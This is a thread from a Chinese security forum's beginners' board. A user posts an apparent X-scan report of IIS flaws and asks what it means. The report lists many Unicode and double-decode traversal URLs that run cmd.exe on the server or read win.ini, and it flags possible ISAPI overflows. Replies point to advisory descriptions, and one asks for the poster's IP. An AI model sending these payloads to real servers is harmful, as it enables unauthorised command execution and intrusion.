论坛: 菜鸟乐园 标题: IIS漏洞帮忙分析?? 复制本贴地址    
作者: shavb [shavb]    论坛用户   登录
/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini [漏洞描述] 
/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini [漏洞描述] 
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 

/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 

/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 

可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 

可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 

谢谢

地主 发表时间: 05/30 14:31

回复: BearKing [bking]   版主   登录
安全焦点都有描述

B1层 发表时间: 05/30 17:57

回复: qq [zpisgod]   论坛用户   登录
x-scan 的iis漏洞扫描报告阿,直接点后面的“漏洞描述”,安全焦点上写的很详细的,不过有的比较深

B2层 发表时间: 05/30 19:42

回复: studio [studio]   论坛用户   登录
能给我ip看看吗??

B3层 发表时间: 05/30 20:42

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号